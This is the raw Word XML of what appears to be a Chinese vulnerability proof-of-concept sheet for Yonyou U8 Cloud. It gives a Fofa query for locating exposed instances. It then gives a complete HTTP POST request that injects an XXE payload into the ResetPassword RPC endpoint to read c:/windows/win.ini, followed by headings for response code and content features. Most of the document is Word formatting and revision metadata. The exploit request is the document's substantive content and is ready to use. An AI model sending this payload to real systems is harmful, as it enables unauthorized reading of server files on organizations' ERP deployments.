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1638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Fofa语法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE27BB8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>app="用友-U8-Cloud"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196723C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漏洞POC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254A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712678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>POST /hrss/dorado/smartweb2.showRPCLoadingTip.d?skin=default&amp;__rpc=true&amp;windows=1 HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1264A9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Host: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="694D5CCA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DBB07A3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="541BE11C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Connection: close</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E8AFB57">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Accept-Language: zh-CN,zh;q=0.9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48539A69">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EAF4117">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>SL-CE-SUID: 29</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71E7DE97">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Content-Length: 636</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C3CF3B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1B4D773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__type=updateData&amp;__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&amp;__xml=%3C%21DOCTYPE+z+%5B%3C%21ENTITY+test++SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%5D%3E%3Crpc+transaction%3D%2210%22+method%3D%22resetPwd%22%3E%3Cdef%3E%3Cdataset+type%3D%22Custom%22+id%3D%22dsResetPwd%22%3E%3Cf+name%3D%22user%22%3E%3C%2Ff%3E%3C%2Fdataset%3E%3C%2Fdef%3E%3Cdata%3E%3Crs+dataset%3D%22dsResetPwd%22%3E%3Cr+id%3D%2210008%22+state%3D%22insert%22%3E%3Cn%3E%3Cv%3E1%3C%2Fv%3E%3C%2Fn%3E%3C%2Fr%3E%3C%2Frs%3E%3C%2Fdata%3E%3Cvps%3E%3Cp+name%3D%22__profileKeys%22%3E%26test%3B%3C%2Fp%3E%3C%2Fvps%3E%3C%2Frpc%3E</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="37EF2DF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响应代码特征</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C5001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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44458A7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响应内容特征</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A228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&lt;files&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1FA9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&lt;Mail&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E8145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1MmRmNDMwNTY5OTYyNDM2N2VjMmMzMjg5NmJjMmQifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="57FD1524"/>
    <w:rsid w:val="00B4047C"/>
    <w:rsid w:val="00CE3EBF"/>
    <w:rsid w:val="0E6B247B"/>
    <w:rsid w:val="0F293A8A"/>
    <w:rsid w:val="0FF7FEA5"/>
    <w:rsid w:val="13DFAD20"/>
    <w:rsid w:val="1785A926"/>
    <w:rsid w:val="17E55D5F"/>
    <w:rsid w:val="1B97CA72"/>
    <w:rsid w:val="1E7A3B29"/>
    <w:rsid w:val="1F5F8E86"/>
    <w:rsid w:val="1F9F2A16"/>
    <w:rsid w:val="1FF3D49F"/>
    <w:rsid w:val="1FFF89E9"/>
    <w:rsid w:val="299F9458"/>
    <w:rsid w:val="29F99800"/>
    <w:rsid w:val="2BBE0817"/>
    <w:rsid w:val="2BFF4FB5"/>
    <w:rsid w:val="2BFF5176"/>
    <w:rsid w:val="2DB5FEFB"/>
    <w:rsid w:val="2DD27B69"/>
    <w:rsid w:val="2DD34CCD"/>
    <w:rsid w:val="2DD5B0C0"/>
    <w:rsid w:val="2EFF020B"/>
    <w:rsid w:val="2FBFBFFB"/>
    <w:rsid w:val="2FDF3766"/>
    <w:rsid w:val="2FFF4B20"/>
    <w:rsid w:val="33397BD2"/>
    <w:rsid w:val="37D79716"/>
    <w:rsid w:val="37EE8CD9"/>
    <w:rsid w:val="37FF2A93"/>
    <w:rsid w:val="37FF9796"/>
    <w:rsid w:val="387F2B36"/>
    <w:rsid w:val="3AB73EF0"/>
    <w:rsid w:val="3BDFC0B7"/>
    <w:rsid w:val="3C93886E"/>
    <w:rsid w:val="3CEF9AF8"/>
    <w:rsid w:val="3D79E67D"/>
    <w:rsid w:val="3EB31C8B"/>
    <w:rsid w:val="3EFC37B8"/>
    <w:rsid w:val="3EFFD843"/>
    <w:rsid w:val="3FBFCB8B"/>
    <w:rsid w:val="3FDEA6AA"/>
    <w:rsid w:val="3FEB3B3D"/>
    <w:rsid w:val="3FF80E9F"/>
    <w:rsid w:val="3FFCDE76"/>
    <w:rsid w:val="418F03C1"/>
    <w:rsid w:val="42FD4AE6"/>
    <w:rsid w:val="46177EB4"/>
    <w:rsid w:val="468F1EA4"/>
    <w:rsid w:val="48D5008D"/>
    <w:rsid w:val="49E73956"/>
    <w:rsid w:val="4F4E1CE2"/>
    <w:rsid w:val="4FDCCC2A"/>
    <w:rsid w:val="4FF7A29A"/>
    <w:rsid w:val="4FFB5482"/>
    <w:rsid w:val="524E74B2"/>
    <w:rsid w:val="53E3D198"/>
    <w:rsid w:val="54FD31BC"/>
    <w:rsid w:val="55BF7986"/>
    <w:rsid w:val="55EBD72F"/>
    <w:rsid w:val="56E7394D"/>
    <w:rsid w:val="57771623"/>
    <w:rsid w:val="577BEC18"/>
    <w:rsid w:val="57FD1524"/>
    <w:rsid w:val="5AFD7C30"/>
    <w:rsid w:val="5B6E52F5"/>
    <w:rsid w:val="5BCDD2E7"/>
    <w:rsid w:val="5BD77C15"/>
    <w:rsid w:val="5BFD9482"/>
    <w:rsid w:val="5D7B3FBC"/>
    <w:rsid w:val="5DFB9FF8"/>
    <w:rsid w:val="5EEB849B"/>
    <w:rsid w:val="5EFD149D"/>
    <w:rsid w:val="5F7A13AB"/>
    <w:rsid w:val="5F7F0FB8"/>
    <w:rsid w:val="5FBF167B"/>
    <w:rsid w:val="5FE9760B"/>
    <w:rsid w:val="5FED12B8"/>
    <w:rsid w:val="5FF1F784"/>
    <w:rsid w:val="5FF3E307"/>
    <w:rsid w:val="60238493"/>
    <w:rsid w:val="617F880E"/>
    <w:rsid w:val="61853D5A"/>
    <w:rsid w:val="63DBC652"/>
    <w:rsid w:val="65FF423B"/>
    <w:rsid w:val="6690A103"/>
    <w:rsid w:val="67E7CB12"/>
    <w:rsid w:val="67FF23E7"/>
    <w:rsid w:val="67FFF15E"/>
    <w:rsid w:val="684F53CA"/>
    <w:rsid w:val="6B54702E"/>
    <w:rsid w:val="6BBB4FAF"/>
    <w:rsid w:val="6BCDD5AF"/>
    <w:rsid w:val="6BDF1674"/>
    <w:rsid w:val="6BF3A92F"/>
    <w:rsid w:val="6D7E2FFF"/>
    <w:rsid w:val="6DB22A8C"/>
    <w:rsid w:val="6EBBFE9E"/>
    <w:rsid w:val="6EF70D5B"/>
    <w:rsid w:val="6EFB71B1"/>
    <w:rsid w:val="6EFE788C"/>
    <w:rsid w:val="6F6F2774"/>
    <w:rsid w:val="6FBD7CF2"/>
    <w:rsid w:val="6FE75C91"/>
    <w:rsid w:val="6FEE5854"/>
    <w:rsid w:val="7020421A"/>
    <w:rsid w:val="70B63205"/>
    <w:rsid w:val="72CFED86"/>
    <w:rsid w:val="73A9F55B"/>
    <w:rsid w:val="73C94D1C"/>
    <w:rsid w:val="73CBABE1"/>
    <w:rsid w:val="73DF1153"/>
    <w:rsid w:val="73FD6563"/>
    <w:rsid w:val="75FDE963"/>
    <w:rsid w:val="76BF7AB2"/>
    <w:rsid w:val="76C18528"/>
    <w:rsid w:val="76EB1E07"/>
    <w:rsid w:val="77E42D04"/>
    <w:rsid w:val="77FB1747"/>
    <w:rsid w:val="77FFE35A"/>
    <w:rsid w:val="785F0ADD"/>
    <w:rsid w:val="7956CD3D"/>
    <w:rsid w:val="79FFF76A"/>
    <w:rsid w:val="7A7BBABE"/>
    <w:rsid w:val="7A95D0EB"/>
    <w:rsid w:val="7AD64DD6"/>
    <w:rsid w:val="7AF94817"/>
    <w:rsid w:val="7B3BD7E9"/>
    <w:rsid w:val="7B7A30CF"/>
    <w:rsid w:val="7B7B0B69"/>
    <w:rsid w:val="7B995757"/>
    <w:rsid w:val="7BADE33A"/>
    <w:rsid w:val="7BD7F576"/>
    <w:rsid w:val="7BF7E1F0"/>
    <w:rsid w:val="7BF7ECA9"/>
    <w:rsid w:val="7BFF60DD"/>
    <w:rsid w:val="7CD5C5D6"/>
    <w:rsid w:val="7CF6A534"/>
    <w:rsid w:val="7CF7A1BC"/>
    <w:rsid w:val="7D39CCA9"/>
    <w:rsid w:val="7D7FDF5C"/>
    <w:rsid w:val="7DFFA47E"/>
    <w:rsid w:val="7E6E81D2"/>
    <w:rsid w:val="7E78C45A"/>
    <w:rsid w:val="7E7BCD1C"/>
    <w:rsid w:val="7E7E60FB"/>
    <w:rsid w:val="7E9F6F51"/>
    <w:rsid w:val="7EAE9A02"/>
    <w:rsid w:val="7EBDF6C6"/>
    <w:rsid w:val="7EFC1F47"/>
    <w:rsid w:val="7EFDDE9E"/>
    <w:rsid w:val="7F26BCBA"/>
    <w:rsid w:val="7F376BCC"/>
    <w:rsid w:val="7F3E08FE"/>
    <w:rsid w:val="7F3F55B7"/>
    <w:rsid w:val="7F6F3B96"/>
    <w:rsid w:val="7F765816"/>
    <w:rsid w:val="7FAFBBCC"/>
    <w:rsid w:val="7FB3A4A5"/>
    <w:rsid w:val="7FB7D77D"/>
    <w:rsid w:val="7FBB719F"/>
    <w:rsid w:val="7FBEA1CB"/>
    <w:rsid w:val="7FCE339B"/>
    <w:rsid w:val="7FD73586"/>
    <w:rsid w:val="7FDB36B4"/>
    <w:rsid w:val="7FDB6353"/>
    <w:rsid w:val="7FDF2293"/>
    <w:rsid w:val="7FDF396C"/>
    <w:rsid w:val="7FE69C24"/>
    <w:rsid w:val="7FED6077"/>
    <w:rsid w:val="7FED80C6"/>
    <w:rsid w:val="7FEFB24F"/>
    <w:rsid w:val="7FF2849D"/>
    <w:rsid w:val="7FF52585"/>
    <w:rsid w:val="7FFAE25C"/>
    <w:rsid w:val="7FFDE5C5"/>
    <w:rsid w:val="7FFE79BD"/>
    <w:rsid w:val="7FFF692E"/>
    <w:rsid w:val="7FFFCBF4"/>
    <w:rsid w:val="7FFFE085"/>
    <w:rsid w:val="8AB78574"/>
    <w:rsid w:val="903BCFC1"/>
    <w:rsid w:val="93F99F0F"/>
    <w:rsid w:val="967B4632"/>
    <w:rsid w:val="97AE0B38"/>
    <w:rsid w:val="99FFFF3F"/>
    <w:rsid w:val="9AFD16AC"/>
    <w:rsid w:val="9BCF7D2B"/>
    <w:rsid w:val="9CFEACB1"/>
    <w:rsid w:val="9F7CD18D"/>
    <w:rsid w:val="9F9720AE"/>
    <w:rsid w:val="9FAF2B7F"/>
    <w:rsid w:val="9FDAB30B"/>
    <w:rsid w:val="9FFDAEBF"/>
    <w:rsid w:val="9FFF3431"/>
    <w:rsid w:val="A1FD5A70"/>
    <w:rsid w:val="A27E69B0"/>
    <w:rsid w:val="A3D3B5AD"/>
    <w:rsid w:val="A6FDCE76"/>
    <w:rsid w:val="A8FB678E"/>
    <w:rsid w:val="AD5B8CAC"/>
    <w:rsid w:val="AEFED516"/>
    <w:rsid w:val="AF47AD03"/>
    <w:rsid w:val="AFB6F41D"/>
    <w:rsid w:val="B0974690"/>
    <w:rsid w:val="B47F41C3"/>
    <w:rsid w:val="B53FB2C1"/>
    <w:rsid w:val="B73E3741"/>
    <w:rsid w:val="B7FF178E"/>
    <w:rsid w:val="B96C5A42"/>
    <w:rsid w:val="BB6E64CC"/>
    <w:rsid w:val="BDEE8467"/>
    <w:rsid w:val="BDFF1BC3"/>
    <w:rsid w:val="BDFF3D9F"/>
    <w:rsid w:val="BE77A9F7"/>
    <w:rsid w:val="BF5D1E32"/>
    <w:rsid w:val="BFB37021"/>
    <w:rsid w:val="BFF7428B"/>
    <w:rsid w:val="BFFEEB34"/>
    <w:rsid w:val="BFFFD0DE"/>
    <w:rsid w:val="BFFFFF57"/>
    <w:rsid w:val="C35F894E"/>
    <w:rsid w:val="C3FE21AB"/>
    <w:rsid w:val="C725C9FC"/>
    <w:rsid w:val="CAF582E6"/>
    <w:rsid w:val="CBBE2114"/>
    <w:rsid w:val="CBFF7C50"/>
    <w:rsid w:val="CD6FAFC1"/>
    <w:rsid w:val="CFDEC857"/>
    <w:rsid w:val="CFEB1D61"/>
    <w:rsid w:val="CFFA9BEF"/>
    <w:rsid w:val="CFFF237C"/>
    <w:rsid w:val="D47BD7E0"/>
    <w:rsid w:val="D7344563"/>
    <w:rsid w:val="D7B732F6"/>
    <w:rsid w:val="D8BF77E5"/>
    <w:rsid w:val="D9AD4A21"/>
    <w:rsid w:val="D9BBCE23"/>
    <w:rsid w:val="DBA4F869"/>
    <w:rsid w:val="DD7D3824"/>
    <w:rsid w:val="DDDFE8FB"/>
    <w:rsid w:val="DE7FDD73"/>
    <w:rsid w:val="DEF9DEED"/>
    <w:rsid w:val="DFCF9D82"/>
    <w:rsid w:val="DFF54C4B"/>
    <w:rsid w:val="DFF63828"/>
    <w:rsid w:val="DFFF08E0"/>
    <w:rsid w:val="DFFFC62C"/>
    <w:rsid w:val="E2DF4477"/>
    <w:rsid w:val="E59FF217"/>
    <w:rsid w:val="E77B0D1F"/>
    <w:rsid w:val="E79B4105"/>
    <w:rsid w:val="E7FA619A"/>
    <w:rsid w:val="E9ED6298"/>
    <w:rsid w:val="EB3FABDA"/>
    <w:rsid w:val="EB9F36C9"/>
    <w:rsid w:val="EBF91784"/>
    <w:rsid w:val="ECB7AB14"/>
    <w:rsid w:val="ECFE5741"/>
    <w:rsid w:val="EDBFE5F3"/>
    <w:rsid w:val="EE3F6450"/>
    <w:rsid w:val="EF7D3A8B"/>
    <w:rsid w:val="EFF9367F"/>
    <w:rsid w:val="EFFAC8C3"/>
    <w:rsid w:val="EFFF8005"/>
    <w:rsid w:val="EFFFA52C"/>
    <w:rsid w:val="EFFFAB75"/>
    <w:rsid w:val="F0FAAA88"/>
    <w:rsid w:val="F1FDE6F5"/>
    <w:rsid w:val="F1FF2A92"/>
    <w:rsid w:val="F27D5C03"/>
    <w:rsid w:val="F27FCA1F"/>
    <w:rsid w:val="F297FCDB"/>
    <w:rsid w:val="F3BF0145"/>
    <w:rsid w:val="F3FBB573"/>
    <w:rsid w:val="F4B7A44D"/>
    <w:rsid w:val="F57112A3"/>
    <w:rsid w:val="F5AB2C7D"/>
    <w:rsid w:val="F5B36BE9"/>
    <w:rsid w:val="F5BF77B4"/>
    <w:rsid w:val="F5F72DF8"/>
    <w:rsid w:val="F6273DA8"/>
    <w:rsid w:val="F6690D7E"/>
    <w:rsid w:val="F6FBF995"/>
    <w:rsid w:val="F76B3DD1"/>
    <w:rsid w:val="F7778859"/>
    <w:rsid w:val="F77FFC25"/>
    <w:rsid w:val="F79E8BA0"/>
    <w:rsid w:val="F7D95AD9"/>
    <w:rsid w:val="F7DB388E"/>
    <w:rsid w:val="F7E28B87"/>
    <w:rsid w:val="F7F5C8C0"/>
    <w:rsid w:val="F7FF6A77"/>
    <w:rsid w:val="F8BF8985"/>
    <w:rsid w:val="F97FB8ED"/>
    <w:rsid w:val="F9962060"/>
    <w:rsid w:val="F9CB2FFD"/>
    <w:rsid w:val="F9E62CBF"/>
    <w:rsid w:val="F9F3E506"/>
    <w:rsid w:val="F9F7F0EB"/>
    <w:rsid w:val="F9FF8D69"/>
    <w:rsid w:val="FA324E87"/>
    <w:rsid w:val="FAFBD3D7"/>
    <w:rsid w:val="FAFDEFD2"/>
    <w:rsid w:val="FAFEF8A2"/>
    <w:rsid w:val="FB5F0364"/>
    <w:rsid w:val="FBA30457"/>
    <w:rsid w:val="FBCB6F0D"/>
    <w:rsid w:val="FBEC3635"/>
    <w:rsid w:val="FBFB645F"/>
    <w:rsid w:val="FC7F72EA"/>
    <w:rsid w:val="FCF06FFB"/>
    <w:rsid w:val="FD1EE484"/>
    <w:rsid w:val="FD4FF5F1"/>
    <w:rsid w:val="FD6AEB77"/>
    <w:rsid w:val="FD7F4FD3"/>
    <w:rsid w:val="FD7F867D"/>
    <w:rsid w:val="FDADAFFC"/>
    <w:rsid w:val="FDB75070"/>
    <w:rsid w:val="FDBE7BD1"/>
    <w:rsid w:val="FDBFAA8F"/>
    <w:rsid w:val="FDBFD45E"/>
    <w:rsid w:val="FDEE5A13"/>
    <w:rsid w:val="FDF1F0A9"/>
    <w:rsid w:val="FDFBD708"/>
    <w:rsid w:val="FDFFBEF1"/>
    <w:rsid w:val="FE7B1328"/>
    <w:rsid w:val="FE9BFA22"/>
    <w:rsid w:val="FEDE071F"/>
    <w:rsid w:val="FEEBBCF6"/>
    <w:rsid w:val="FEF27B8B"/>
    <w:rsid w:val="FEFA3455"/>
    <w:rsid w:val="FEFC3A5C"/>
    <w:rsid w:val="FEFC4869"/>
    <w:rsid w:val="FF4FFC4C"/>
    <w:rsid w:val="FF5DA5AC"/>
    <w:rsid w:val="FF679AA1"/>
    <w:rsid w:val="FF6D89C7"/>
    <w:rsid w:val="FF7BC27C"/>
    <w:rsid w:val="FF7CA208"/>
    <w:rsid w:val="FF7FA203"/>
    <w:rsid w:val="FFBC1160"/>
    <w:rsid w:val="FFBCCD69"/>
    <w:rsid w:val="FFBDD75C"/>
    <w:rsid w:val="FFBF78FF"/>
    <w:rsid w:val="FFBF7C90"/>
    <w:rsid w:val="FFDEFE55"/>
    <w:rsid w:val="FFDF9E60"/>
    <w:rsid w:val="FFDFA1FC"/>
    <w:rsid w:val="FFDFC11F"/>
    <w:rsid w:val="FFE4EA8F"/>
    <w:rsid w:val="FFEF119A"/>
    <w:rsid w:val="FFF11AE6"/>
    <w:rsid w:val="FFF3FA3D"/>
    <w:rsid w:val="FFF7BF3C"/>
    <w:rsid w:val="FFF9B26C"/>
    <w:rsid w:val="FFFB349C"/>
    <w:rsid w:val="FFFB3EFB"/>
    <w:rsid w:val="FFFC469D"/>
    <w:rsid w:val="FFFC8503"/>
    <w:rsid w:val="FFFD6A02"/>
    <w:rsid w:val="FFFDF767"/>
    <w:rsid w:val="FFFE2F17"/>
    <w:rsid w:val="FFFF0078"/>
    <w:rsid w:val="FFFFE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494</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>521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2024-03-07T08:56:00Z</dcterms:created>
  <dc:creator>路边菜贩子</dc:creator>
  <cp:lastModifiedBy>W.CONG</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-21T11:40:22Z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239BAF64848D2AE6A9B1B1659314282A_41</vt:lpwstr>
  </property>
</Properties>
</file>